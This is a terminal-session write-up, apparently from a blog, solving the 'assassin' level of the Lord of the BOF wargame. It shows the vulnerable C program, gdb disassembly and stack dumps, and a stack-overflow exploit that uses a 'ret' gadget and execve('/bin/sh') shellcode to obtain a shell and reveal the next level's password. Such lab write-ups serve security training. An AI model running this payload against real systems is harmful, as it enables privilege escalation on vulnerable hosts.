login: giant
Password:
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ cat assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Entry point of the "assassin" challenge binary.
 *
 * Takes a single command-line argument (argv[1]) and copies it into a
 * fixed-size stack buffer.  The two byte checks below only look at
 * argv[1][47], i.e. the most significant byte of the 4-byte word that sits
 * at offset 44 (just past buffer[40] + the 4-byte saved frame pointer) on
 * this 32-bit build; see the "no stack, no RTL" note in the file header.
 *
 * Defects visible in this listing (intentional for the wargame, but worth
 * naming): the copy on the strcpy line is unbounded, argv[1][47] is read
 * without checking the argument's length, and strcpy/memset are used with
 * only <stdio.h> and <stdlib.h> included (no <string.h>), so they are
 * implicitly declared.  The return type of main is also implicit (pre-C99).
 *
 * Returns: nothing explicit; every early-exit path calls exit(0).
 */
main(int argc, char *argv[])
{
/* 40-byte stack buffer; the disassembly on this page shows it at [ebp-40],
 * directly below the saved ebp and the return address. */
char buffer[40];
/* Require an argument; argc < 2 means argv[1] would be NULL. */
if(argc < 2){
printf("argv error\n");
exit(0);
}
/* Reject inputs whose byte 47 is 0xbf (top byte of a stack address).
 * NOTE(review): this indexes argv[1] without a length check, so a shorter
 * argument makes this an out-of-bounds read. */
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
/* Reject inputs whose byte 47 is 0x40 (top byte of a shared-library
 * address on this system); same missing length check as above. */
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
/* Unbounded copy: anything longer than 40 bytes overwrites the saved frame
 * pointer and the return address.  A bounded copy (e.g. snprintf with
 * sizeof buffer) would remove the overflow. */
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
/* Zeroes the 40-byte buffer plus the 4-byte saved frame pointer (44 bytes
 * total), so the frame contents below the return address are wiped before
 * main returns. */
memset(buffer, 0, 44);
}
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ gdb -q assassin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
[1]+ Stopped gdb -q assassin
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ cp assassin essessin
[giant@localhost giant]$ ./essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "
> \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
File "<string>", line 1
print "\x90"*44 + "a"*12 + "\x90"*100 + "
^
SyntaxError: invalid token
argv error
[giant@localhost giant]$ ls
assassin assassin.c essessin
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb) b*main+6
Breakpoint 1 at 0x8048476
(gdb) r `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048476 in main ()
(gdb) x/300x $esp
0xbffffa40: 0xbffffa68 0x4000a970 0x400f855b 0x080495d4
0xbffffa50: 0x4000ae60 0xbffffab4 0xbffffa68 0x0804845b
0xbffffa60: 0x080495c0 0x080495d4 0xbffffa88 0x400309cb
0xbffffa70: 0x00000002 0xbffffab4 0xbffffac0 0x40013868
0xbffffa80: 0x00000002 0x080483c0 0x00000000 0x080483e1
0xbffffa90: 0x08048470 0x00000002 0xbffffab4 0x08048308
0xbffffaa0: 0x0804854c 0x4000ae60 0xbffffaac 0x40013e90
0xbffffab0: 0x00000002 0xbffffbb3 0xbffffbc8 0x00000000
0xbffffac0: 0xbffffc7e 0xbffffca0 0xbffffcaa 0xbffffcb8
0xbffffad0: 0xbffffcd7 0xbffffce5 0xbffffcfe 0xbffffd19
0xbffffae0: 0xbffffd38 0xbffffd43 0xbffffd51 0xbffffd92
0xbffffaf0: 0xbffffda3 0xbffffdb8 0xbffffdc8 0xbffffdd3
0xbffffb00: 0xbffffdf0 0xbffffdfb 0xbffffe0c 0xbffffe1c
0xbffffb10: 0xbffffe24 0x00000000 0x00000003 0x08048034
0xbffffb20: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffb30: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffb40: 0x00000008 0x00000000 0x00000009 0x080483c0
0xbffffb50: 0x0000000b 0x00000202 0x0000000c 0x00000202
0xbffffb60: 0x0000000d 0x00000202 0x0000000e 0x00000202
0xbffffb70: 0x00000010 0x0f8bfbff 0x0000000f 0xbffffbae
0xbffffb80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba0: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffbb0: 0x2f003638 0x656d6f68 0x6169672f 0x652f746e
0xbffffbc0: 0x73657373 0x006e6973 0x90909090 0x90909090
0xbffffbd0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf0: 0x90909090 0x61616161 0x61616161 0x61616161
0xbffffc00: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc60: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffc70: 0x50e3896e 0x89e18953 0xcd0bb0c2 0x454c0080
0xbffffc80: 0x504f5353 0x7c3d4e45 0x7273752f 0x6e69622f
0xbffffc90: 0x73656c2f 0x70697073 0x68732e65 0x00732520
0xbffffca0: 0x52455355 0x454d414e 0x4948003d 0x49535453
0xbffffcb0: 0x313d455a 0x00303030 0x54534f48 0x454d414e
0xbffffcc0: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f
0xbffffcd0: 0x616d6f64 0x4c006e69 0x414e474f 0x673d454d
0xbffffce0: 0x746e6169 0x4d455200 0x4845544f 0x3d54534f
0xbffffcf0: 0x2e323931 0x2e383631 0x2e343831 0x414d0031
0xbffffd00: 0x2f3d4c49 0x2f726176 0x6f6f7073 0x616d2f6c
0xbffffd10: 0x672f6c69 0x746e6169 0x43414d00 0x50595448
0xbffffd20: 0x33693d45 0x722d3638 0x61686465 0x696c2d74
0xbffffd30: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d
0xbffffd40: 0x48006d72 0x5454534f 0x3d455059 0x36383369
0xbffffd50: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f
0xbffffd60: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273
0xbffffd70: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36
0xbffffd80: 0x682f3a6e 0x2f656d6f 0x6e616967 0x69622f74
0xbffffd90: 0x4f48006e 0x2f3d454d 0x656d6f68 0x6169672f
0xbffffda0: 0x4900746e 0x5455504e 0x2f3d4352 0x2f637465
0xbffffdb0: 0x75706e69 0x00637274 0x4c454853 0x622f3d4c
0xbffffdc0: 0x622f6e69 0x00687361 0x52455355 0x6169673d
0xbffffdd0: 0x4200746e 0x5f485341 0x3d564e45 0x6d6f682f
0xbffffde0: 0x69672f65 0x2f746e61 0x7361622e 0x00637268
0xbffffdf0: 0x474e414c 0x5f6e653d 0x4f005355 0x50595453
0xbffffe00: 0x696c3d45 0x2d78756e 0x00756e67 0x3d445750
0xbffffe10: 0x6d6f682f 0x69672f65 0x00746e61 0x564c4853
0xbffffe20: 0x00323d4c 0x435f534c 0x524f4c4f 0x6f6e3d53
0xbffffe30: 0x3a30303d 0x303d6966 0x69643a30 0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+ Stopped gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb) b*main
Breakpoint 1 at 0x8048470
(gdb) r `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048470 in main ()
(gdb) x/300x $esp
0xbffffa7c: 0x400309cb 0x00000002 0xbffffac4 0xbffffad0
0xbffffa8c: 0x40013868 0x00000002 0x080483c0 0x00000000
0xbffffa9c: 0x080483e1 0x08048470 0x00000002 0xbffffac4
0xbffffaac: 0x08048308 0x0804854c 0x4000ae60 0xbffffabc
0xbffffabc: 0x40013e90 0x00000002 0xbffffbb7 0xbffffbcc
0xbffffacc: 0x00000000 0xbffffc7e 0xbffffca0 0xbffffcaa
0xbffffadc: 0xbffffcb8 0xbffffcd7 0xbffffce5 0xbffffcfe
0xbffffaec: 0xbffffd19 0xbffffd38 0xbffffd43 0xbffffd51
0xbffffafc: 0xbffffd92 0xbffffda3 0xbffffdb8 0xbffffdc8
0xbffffb0c: 0xbffffdd3 0xbffffdf0 0xbffffdfb 0xbffffe0c
0xbffffb1c: 0xbffffe1c 0xbffffe24 0x00000000 0x00000003
0xbffffb2c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb3c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb4c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb5c: 0x080483c0 0x0000000b 0x00000202 0x0000000c
0xbffffb6c: 0x00000202 0x0000000d 0x00000202 0x0000000e
0xbffffb7c: 0x00000202 0x00000010 0x0f8bfbff 0x0000000f
0xbffffb8c: 0xbffffbb2 0x00000000 0x00000000 0x00000000
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffffbbc: 0x6169672f 0x652f746e 0x73657373 0x006e6973
0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbec: 0x90909090 0x90909090 0x90909090 0x61616161
0xbffffbfc: 0x61616161 0x90909090 0x90909090 0x90909090
0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc5c: 0x90909090 0x90909090 0x6850c031 0x68732f2f
0xbffffc6c: 0x69622f68 0x50e3896e 0x89e18953 0xcd0bb0c2
0xbffffc7c: 0x454c0080 0x504f5353 0x7c3d4e45 0x7273752f
0xbffffc8c: 0x6e69622f 0x73656c2f 0x70697073 0x68732e65
0xbffffc9c: 0x00732520 0x52455355 0x454d414e 0x4948003d
0xbffffcac: 0x49535453 0x313d455a 0x00303030 0x54534f48
0xbffffcbc: 0x454d414e 0x636f6c3d 0x6f686c61 0x6c2e7473
0xbffffccc: 0x6c61636f 0x616d6f64 0x4c006e69 0x414e474f
0xbffffcdc: 0x673d454d 0x746e6169 0x4d455200 0x4845544f
0xbffffcec: 0x3d54534f 0x2e323931 0x2e383631 0x2e343831
0xbffffcfc: 0x414d0031 0x2f3d4c49 0x2f726176 0x6f6f7073
0xbffffd0c: 0x616d2f6c 0x672f6c69 0x746e6169 0x43414d00
0xbffffd1c: 0x50595448 0x33693d45 0x722d3638 0x61686465
0xbffffd2c: 0x696c2d74 0x2d78756e 0x00756e67 0x4d524554
0xbffffd3c: 0x6574783d 0x48006d72 0x5454534f 0x3d455059
0xbffffd4c: 0x36383369 0x54415000 0x752f3d48 0x6c2f7273
0xbffffd5c: 0x6c61636f 0x6e69622f 0x69622f3a 0x752f3a6e
0xbffffd6c: 0x622f7273 0x2f3a6e69 0x2f727375 0x52313158
0xbffffd7c: 0x69622f36 0x682f3a6e 0x2f656d6f 0x6e616967
0xbffffd8c: 0x69622f74 0x4f48006e 0x2f3d454d 0x656d6f68
0xbffffd9c: 0x6169672f 0x4900746e 0x5455504e 0x2f3d4352
0xbffffdac: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbffffdbc: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbffffdcc: 0x6169673d 0x4200746e 0x5f485341 0x3d564e45
0xbffffddc: 0x6d6f682f 0x69672f65 0x2f746e61 0x7361622e
0xbffffdec: 0x00637268 0x474e414c 0x5f6e653d 0x4f005355
0xbffffdfc: 0x50595453 0x696c3d45 0x2d78756e 0x00756e67
0xbffffe0c: 0x3d445750 0x6d6f682f 0x69672f65 0x00746e61
0xbffffe1c: 0x564c4853 0x00333d4c 0x435f534c 0x524f4c4f
0xbffffe2c: 0x6f6e3d53 0x3a30303d 0x303d6966 0x69643a30
0xbffffe3c: 0x3b31303d 0x6c3a3433 0x31303d6e 0x3a36333b
0xbffffe4c: 0x343d6970 0x33333b30 0x3d6f733a 0x333b3130
0xbffffe5c: 0x64623a35 0x3b30343d 0x303b3333 0x64633a31
0xbffffe6c: 0x3b30343d 0x303b3333 0x726f3a31 0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+ Stopped gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\x0c\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
bash$ my-pass
euid = 515
pushing me away
bash$
LOB 15번
2020. 8. 2. 00:11